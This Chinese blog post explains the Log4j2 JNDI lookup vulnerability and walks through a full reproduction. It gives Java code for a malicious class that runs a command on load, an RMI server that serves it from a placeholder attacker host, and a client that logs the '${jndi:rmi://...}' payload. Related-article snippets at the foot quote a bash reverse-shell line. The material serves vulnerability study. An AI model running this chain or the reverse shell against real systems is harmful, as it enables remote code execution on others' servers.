最近Log4j2被爆高危漏洞,漏洞如何复现,原理是什么呢?

最新推荐文章于 2024-04-18 02:01:34 发布
最新推荐文章于 2024-04-18 02:01:34 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 玄明hanko(java)-技术笔记 文章标签: java apache 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/citywu123/article/details/121956779
版权

​​​​​​​相信大家看到最多的就是这张图片了,打了码,还出来个计算器

String source = "${jndi:rmi://黑客IP:1099/test}";
logger.error(source);

上面这段代码并不会像预想的打印出字符串,"${jndi:rmi://黑客ip:端口/test}"出来,如果这个日志是在自己的机器里打印的,就会在自己的机器里启动计算器工具。

这现象的原理是什么呢?

关键就是这两条:

1、log4j2打印日志时,部分字符串会当成命令名服务被执行。

2、log4j2可以通过jndi:rmi下载远程代码,并在自己机器执行

以下是详细说明:

Apache Log4j 2
Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback’s architecture.


Important: Security Vulnerability CVE-2021-45046
The Log4j team has been made aware of a security vulnerability, CVE-2021-45046, that has been addressed in Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8 and up.

Summary: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.

Details
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default.

Note that previous mitigations involving configuration such as setting the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability.

以上是apache官网的一段说明,我们之前使用的log打印一般是log4j,然后就是logback当然springboot默认的也是logbac。因为在性能上logback优于log4j,从官网上看log4j2性能会优于log4j及logback,所以后面不少人升级成log4j2当然好像这几个的作者都是同一个大神。

回到我们的问题为什么会出现这种问题,还是官网上说的log4j2提供了一些可以让用户查询一些配置信息

​上图可以看出log4j2通过  logger.info("${java:hw}")可以打印出服务器cpu信息出来而不是字符串“${java:hw}”,大家可以看到这个就类似sql注入也,另外一个关键的就是log4j2此功能是通过java  lookup实现的,也就是说黑客可以这样操作:

从上图可以看出,最关键的地方就在红色部署,用户机器会下载黑客的可执行文件并在用户机器上执行就是这病毒了,最上面演示的demo就是黑客让用户执行了自己机器上打开了计算器工具。

如果大家想自己实验一下可以参考以下的代码,这个是引用了网上一篇博客:

原文链接:https://blog.csdn.net/lizz861109/article/details/121928916

当然这篇博客没有实现  rmi://127.0.0.1:1099/xxxx  这个rmi服务代码可参考:

​p.s.  网上很多程序都不完整或打了码

​
//step1:在黑客机新建HackerObj.java 

import javax.lang.model.element.Name;
import javax.naming.Context;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.HashMap;

/**
 * @Author: hanko
 * @Date: 2021-12-16 10:12
 */
public class HackerObj {
    public static void exec(String cmd) throws IOException {
        String sb = "";
        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
        String lineStr;
        while ((lineStr = inBr.readLine()) != null) {
            sb += lineStr + "\n";

        }
        inBr.close();
        inBr.close();
    }

    public Object getObjectInstance(Object obj, Name name,
         Context context, HashMap<?, ?> environment) throws Exception {
        return null;
    }

    static {
        try {
            System.out.println("黑客程序在此机器被执行了。");
            exec("calc.exe");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

//step2:在黑客机把HackerObj.java编译成HackerObj.class,然后开个nginx把HackerObj.class放进去让它可以在网络上访问,如: http://黑客ip:8080/HackerObj.class

p.s. HackerObj.java创造时不要放在package里,放package里好像被用户下载会提示notfindclass,有空再研究一下。

//step3: 创建个Server.java启动黑客rmi服务

package com.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
 * @Author: hanko
 * @Date: 2021-12-16 9:18
 */
public class Server {
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1099);
        //http://黑客ip:8080/HackerObj.class
        String url = "http://黑客ip:8080/"; 
        System.out.println("Create RMI registry on port 1099");
        Reference reference = new Reference("HackerObj", "HackerObj", url);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("test", referenceWrapper);
    }
}


//stpe4:在用户机新建Client.java,

package com.jndi;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * @Author: hanko
 * @Date: 2021-12-16 10:27
 */
public class Client {
    static Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:rmi://黑客ip:1099/test}");
    }
}


// 在用户机执行Client.java会发现“黑客程序在此机器被执行了。”
//在用户机器打印出来了,同时用户机器计算器工具也被打开了


//step5: log4j2  复现就是用以下代码
 logger.info("${java:vm}");
 logger.error("${jndi:rmi://黑客ip:1099/test}");



​

总结

关键就是这两条:

1、log4j2打印日志时,部分字符串会当成命令名服务被执行。

2、log4j2可以通过jndi:rmi下载远程代码,并在自己机器执行

栈江湖
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3196
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
log4j2漏洞原理简述
xianyu9w的博客
04-02 6682
影响版本 Apache Log4j 2.x <= 2.14.1 jdk不知道,有知道的师傅麻烦告诉下 漏洞原理 由于Apache Log4j存在递归解析功能(lookup),未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。 lookup相当于是一个接口,具体去哪里查找,怎么查找,就需要编写具体的模块去实现了,类似于面向对象编程中多态那意思。单单lookup的话打印一些服务器信息什么的危害倒是不大,但是加上JNDI就有意思了。 JNDI(Java Na
Log4J2漏洞(CVE-2021-44228)原理_log4j2漏洞原理(1),从入门到真香
最新发布
m0_57540801的博客
04-18 606
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Log4j2再现高危漏洞
m0_60797416的博客
12-20 179
Log4j2组件引发的安全风险还在持续增加。上周五(12月17日)Apache软件基金会(ASF)为广泛使用的日志库推出另一个补丁版本2.17.0,该补丁版本是为了应对黑客利用第三个Log4j2漏洞进行拒绝服务(DoS)攻击。 该漏洞编号为CVE-2021-45105(CVSS评分:7.5),新漏洞影响该组件的所有版本,从2.0-beta9到2.16.0。ASF在之前发布了2.16版本用于修复第二个Log4j2漏洞(CVE-2021-45046远程代码执行漏洞)。但是该修复版本仅仅是CVE-2...
log4j2高危漏洞原理分析
gejiangbo222的专栏
12-22 3342
原理分析 了解2.15版本前log4j2可输出变量 首先新建一个maven项目,加入log4j2的代码,我们用maven方式,只需要引入这两个pom依赖即可 <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <ve...
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理
跳小闹成长记
12-14 1万+
本文将和大家一起对Log4j2漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞Java高低版本中的不同攻击原理 3、Log4j2漏洞Java高低版本中的攻击步骤 4、Log4j2漏洞在2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
Apache Log4j2漏洞详解及修复指南》 在网络安全领域,Apache Log4j2漏洞是一个备受关注的话题,尤其在2021年底,该漏洞的出现引发了全球范围内的广泛关注。这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java...
log4j2漏洞补丁log4j2.15-rc2 log4j2.16.0.zip
12-14
针对这一高危漏洞Apache发布了两个紧急补丁:log4j2.15-rc2和log4j2.16.0。这两个版本均修复了核心问题,阻止了未授权的远程代码执行。log4j2.15-rc2是第一个候选发布版本,它禁用了默认情况下的JNDI查找功能,...
Log4J2远程代码执行漏洞修复20211210.rar
12-13
然而,在2021年12月,研究人员发现了一个高危的远程代码执行漏洞,该漏洞存在于Log4J2的JNDI(Java Naming and Directory Interface)查找功能中。当应用程序接收到包含恶意构造的字符串并将其记录时,攻击者可以...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
Themeleaf Nginx Logback Log4j2 Hibernate ApacheServer Hive Freemarker Flume 中文文档
07-28
'Apache Flume 1.9.0 中文文档.epub' 'Log4j2 中文文档.epub' 'Apache FreeMarker 2.3.28 中文文档.epub' 'Logback 1.3.0-alpha4 中文文档.epub' 'Apache Hive 3.1.1 中文文档.epub' 'Nginx 中文文档.epub' 'Apache Server 2.4 中文文档.epub' 'Thymeleaf 3.0 中文文档.epub' 'Hibernate 5.4 中文文档.epub'
老生常谈Log4jLog4j2的区别(推荐)
08-30
下面小编就为大家带来老生常谈Log4jLog4j2的区别(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
从0到1带你深入理解log4j2漏洞
kali_Ma的博客
12-27 6561
0x01前言 最近IT圈被爆出的log4j2漏洞闹的沸沸扬扬,log4j2作为一个优秀的java程序日志监控组件,被应用在了各种各样的衍生框架中,同时也是作为目前java全生态中的基础组件之一,这类组件一旦崩塌将造成不可估量的影响。 从Apache Log4j2 漏洞影响面查询的统计来看,影响多达60644个开源软件,涉及相关版本软件包更是达到了321094个。而本次漏洞的触发方式简单,利用成本极低,可以说是一场java生态的‘浩劫’。本文将从零到一带你深入了解log4j2漏洞。知其所以然,方可深刻理解、有
“互联网安全危机”Log4j日志框架爆出的漏洞让安全团队焦头烂额。
m0_65135736的博客
12-16 1548
广泛使用的Log4j日志库爆出漏洞,无异于一场重大安全危机,危机很快波及整个互联网的数字系统,也让各路黑客试图乘虚而入。研究人员警告称,即使推出修复补丁,全球范围内的严重影响可能也无法挽回了。 而问题就出在Log4j上。Log4jApache旗下一款通用的开源日志记录框架,开发人员用它来记录应用内的行为。Apache的安全响应人员正在争分夺秒地修复该漏洞,同时黑客也在利用该漏洞远程控制易受攻击的系统。更有黑客已经开发出自动利用该漏洞的工具,以及可在适当条件下从一个易受攻击的系统独立传播到另一个系统的蠕虫
log4j2远程代码执行漏洞 nginx接入层限制
lzw_me
12-13 3239
naxsi_core.rules配置 naxsi_mysite.rules 配置 重启nginx 完成。
一问三不知之log4j2漏洞简析
热门推荐
lumingzhu111的博客
12-11 4万+
1.log4j2漏洞介绍 1.1简介 Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Logback架构中的一些问题。是目前最优秀的Java日志框架之一。 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apa
log4j2 远程代码注入漏洞1 demo
weixin_42710740的博客
12-22 3836
网上已经有大量的资料讲解了漏洞的原因和发展过程,我主要写实现过程 依赖: <!--log4j 版本< 2.15即可 --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.12.1</..
当我在围观log4j2漏洞时,我在想什么?
小白码上飞
12-14 3366
了解了一下DNSLog是干啥的,以及复现log4j2漏洞攻击
Apache log4j2漏洞原理是什么
06-07
Apache log4j2漏洞(CVE-2021-44228)是由于log4j2库中的JNDI注入漏洞导致的。当应用程序使用log4j2库处理日志时,攻击者可以通过恶意构造的日志信息中的JNDI注入Payload来执行任意代码。这个漏洞的本质是在log4j2的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

栈江湖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值